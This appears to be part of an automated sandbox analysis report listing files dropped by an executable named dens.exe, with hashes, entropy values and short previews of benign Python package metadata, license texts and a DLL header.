                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13936
                                                                                                                                                                                                                                            Entropy (8bit):5.135214154002924
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:cke8RQ6KSAdxC9ad9iqsibQtKti9zpQpzu9Jkh:K8RQ6q7C9ad9iqT8cti9zpQpzu7kh
                                                                                                                                                                                                                                            MD5:FCF6B249C2641540219A727F35D8D2C2
                                                                                                                                                                                                                                            SHA1:C6E195F9AA30CC9B675D1612CA4FB7F74111BD35
                                                                                                                                                                                                                                            SHA-256:3B2F81FE21D181C499C59A256C8E1968455D6689D269AA85373BFB6AF41DA3BF
                                                                                                                                                                                                                                            SHA-512:70367B908204B5922E5D9D2ACE39437DBAA1EEFDAD1797B50CC6E7DCA168D9B59199353BADDDCAEEE12B49D328FC8132F628952383CFE6803CB4F4BF9B9D6D86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:A. HISTORY OF THE SOFTWARE.==========================..Python was created in the early 1990s by Guido van Rossum at Stichting.Mathematisch Centrum (CWI, see https://www.cwi.nl) in the Netherlands.as a successor of a language called ABC. Guido remains Python's.principal author, although it includes many contributions from others...In 1995, Guido continued his work on Python at the Corporation for.National Research Initiatives (CNRI, see https://www.cnri.reston.va.us).in Reston, Virginia where he released several versions of the.software...In May 2000, Guido and the Python core development team moved to.BeOpen.com to form the BeOpen PythonLabs team. In October of the same.year, the PythonLabs team moved to Digital Creations, which became.Zope Corporation. In 2001, the Python Software Foundation (PSF, see.https://www.python.org/psf/) was formed, a non-profit organization.created specifically to own Python-related Intellectual Property..Zope Corporation was a sponsoring member of the PS
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3018
                                                                                                                                                                                                                                            Entropy (8bit):5.0579916471633
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DtkCMU2ymXbFX1QI/aMktjaVQEBu+FOK+W6i+qXd0qme28mIp9DvvV+Vz+nlh:DtkCD/mxX1QI/aMktjaVBroBBqd0VODD
                                                                                                                                                                                                                                            MD5:8303191AC93E4D32457A4A9E3CDAD8E5
                                                                                                                                                                                                                                            SHA1:B6ADA54B9516D20B69A5DD5CDED868DA22C5E252
                                                                                                                                                                                                                                            SHA-256:05E51021AF1C9D86EB8D6C7E37C4CECE733D5065B91A6D8389C5690ED440F16D
                                                                                                                                                                                                                                            SHA-512:F2F5DBE5EA55ED720FA4191180076E9EFFCB9C811C3C7BF1A1201E9D78590B381E125EAF7B8366B28A03383C2958449423548576605E8DCB5CC11C33C9B0E709
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typing_extensions.Version: 4.12.2.Summary: Backported and Experimental Type Hints for Python 3.8+.Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing.Author-email: "Guido van Rossum, Jukka Lehtosalo, .ukasz Langa, Michael Lee" <levkivskyi@gmail.com>.Requires-Python: >=3.8.Description-Content-Type: text/markdown.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Langua
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):571
                                                                                                                                                                                                                                            Entropy (8bit):5.751670348693122
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:rCA89x0a/2zDuxv/vjWaxLbSaLjxjxXaefIE12BATqyo/C:mA87n/2zD6vXCulVZf5Cc4C
                                                                                                                                                                                                                                            MD5:B884E8832BFB336C2D7F54271F11EE1C
                                                                                                                                                                                                                                            SHA1:5A3BAABEE79E0CF32D2E87C9AF0FBB3AAD8CACAD
                                                                                                                                                                                                                                            SHA-256:7710002D81971E632AA6A2FC33DC5D74AAF5D7CAAE22040A65D3E31503B05EE9
                                                                                                                                                                                                                                            SHA-512:0A5EB3ABED212C474CB5FDDEF47F8E62DAA130128F2BB368A8E1F12E143DAE2F8B2EF4A9B85A883A03C67195829AD637DB7CF7CC4B41535AF6CA5668F8F2BD0B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:__pycache__/typing_extensions.cpython-312.pyc,,..typing_extensions-4.12.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typing_extensions-4.12.2.dist-info/LICENSE,sha256=Oy-B_iHRgcSZxZolbI4ZaEVdZonSaaqFNzv7avQdo78,13936..typing_extensions-4.12.2.dist-info/METADATA,sha256=BeUQIa8cnYbrjWx-N8TOznM9UGW5Gm2DicVpDtRA8W0,3018..typing_extensions-4.12.2.dist-info/RECORD,,..typing_extensions-4.12.2.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..typing_extensions.py,sha256=gwekpyG9DVG3lxWKX4ni8u7nk3We5slG98mA9F3DJQw,134451..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3575
                                                                                                                                                                                                                                            Entropy (8bit):5.085545958857746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:D0h4aC/S802Vpnu3pyt1Q+/+DeVb0ksYSwTgD:Oc/z02Vpnu3pytS+2DeVNfSwTW
                                                                                                                                                                                                                                            MD5:F659E7F578CE6FD3753871DBBBA1F939
                                                                                                                                                                                                                                            SHA1:C53B0E6A2E3D94093E2FE4978926A7439B47D43C
                                                                                                                                                                                                                                            SHA-256:508AE4FE43081C64B0B0A2828588B3A8CC3430C6693D1676662569400B0DFDB1
                                                                                                                                                                                                                                            SHA-512:2C0496B76D259259A8F1E57F3ED2224A7E3E99FF309F764C00A8377BB5BD1C94035BDDF24BD1BA637209677CB9F4E8109F84C50B3488B5B8FC372B6BEDAB9AE0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: zipp.Version: 3.19.2.Summary: Backport of pathlib-compatible object wrapper for zip files.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/zipp.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: test.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'test'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'test'.Requir
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1039
                                                                                                                                                                                                                                            Entropy (8bit):5.8094923667268965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:An/2zDlvbqfuiwbWk/EsJ6Xam9lpW8OWq3tW36nJA3u3iWwksYW:AnuXlzUuitk/5J6f9lpW8OW4tM6nJSkE
                                                                                                                                                                                                                                            MD5:1E77310EF3277C93430D969FEAC8FDFC
                                                                                                                                                                                                                                            SHA1:173240337F249E2A6D54206AA0D0ACB0FDED12D7
                                                                                                                                                                                                                                            SHA-256:F316F2E03FD9ADE7EBBC0B154706848E2BB8FD568B90935109F0D8E3CE2B9BFE
                                                                                                                                                                                                                                            SHA-512:68F752DAF2DBEB79644337E4DB9B8CEAEAE3606A865EDC32BE16785DC97BDCF38EF200F0EDC86DC9D71ABA72E108D2851A510F0EB598FFEA286503F0C9772E5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:zipp-3.19.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..zipp-3.19.2.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..zipp-3.19.2.dist-info/METADATA,sha256=UIrk_kMIHGSwsKKChYizqMw0MMZpPRZ2ZiVpQAsN_bE,3575..zipp-3.19.2.dist-info/RECORD,,..zipp-3.19.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp-3.19.2.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..zipp-3.19.2.dist-info/top_level.txt,sha256=iAbdoSHfaGqBfVb2XuR9JqSQHCoOsOtG6y9C_LSpqFw,5..zipp/__init__.py,sha256=QuI1g00G4fRAcGt-HqbV0oWIkmSgedCGGYsHHYzNa8A,13412..zipp/__pycache__/__init__.cpython-312.pyc,,..zipp/__pycache__/glob.cpython-312.pyc,,..zipp/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp/compat/__pycache__/__init__.cpython-312.pyc,,..zipp/compat/__pycache__/py310.cpython-312.pyc,,..zipp/compat/py310.py,sha256=eZpkW0zRtunkhEh8jjX3gCGe22emoKCBJw72Zt4RkhA,219..zipp/glob.py,sha256=etWpnfEoRyf
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5
                                                                                                                                                                                                                                            Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:m:m
                                                                                                                                                                                                                                            MD5:9B929466EC7848714DE24BCF75AE57CB
                                                                                                                                                                                                                                            SHA1:ECC9237295CDA9B690BE094E58FAE1458A4B0389
                                                                                                                                                                                                                                            SHA-256:8806DDA121DF686A817D56F65EE47D26A4901C2A0EB0EB46EB2F42FCB4A9A85C
                                                                                                                                                                                                                                            SHA-512:C8D8967BE2B5094A5D72BA4BEF5DBDA2CBF539BF3B8B916CF86854087A12DF82B51B7BF5B6EFA79898692EFD22FAD9688058448CAAB198FB708A0E661DC685EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:zipp.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1541912
                                                                                                                                                                                                                                            Entropy (8bit):6.576517980395355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:OU/QhAI889YyuQYZlm/8AgzMkf6G5MJ8NW/yKhh+ivz/LZ/Xm+5D3ovTDJl:HVyuQYZlm/8vP6G5MJ8NuF+IzDZ/XPoP
                                                                                                                                                                                                                                            MD5:F3592DA629E4F247598E232B2CBFBAC1
                                                                                                                                                                                                                                            SHA1:65429FBEC3F5545640F2CDA784DC7DCCA420EB3B
                                                                                                                                                                                                                                            SHA-256:054A7B736DE7AFBD447B07EE5E72DF2FEBCAA06758F7A028873771567E8735D3
                                                                                                                                                                                                                                            SHA-512:6FC24890A7BE1ED73F1EFDF2B7723C3A7DE5DDB36B87FF7B01949FC2B14813E7B7C8B8311ABEE2796A9A4EFFFEDFC1D2020FFA794E59004CA4FB6798B993190D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tB..,...,...,..m....,.D.-...,.D./...,.D.(...,.D.)...,..m-...,...-...,...$...,...,...,......,.......,.Rich..,.........PE..d....b.f.........." ...(.2...,.......1....................................................`..............................................#...&.......p...............X.../......X...0...T..............................@............P..X............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...`M...@...D..................@....pdata...............`..............@..@.rsrc........p.......>..............@..@.reloc..X............H..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
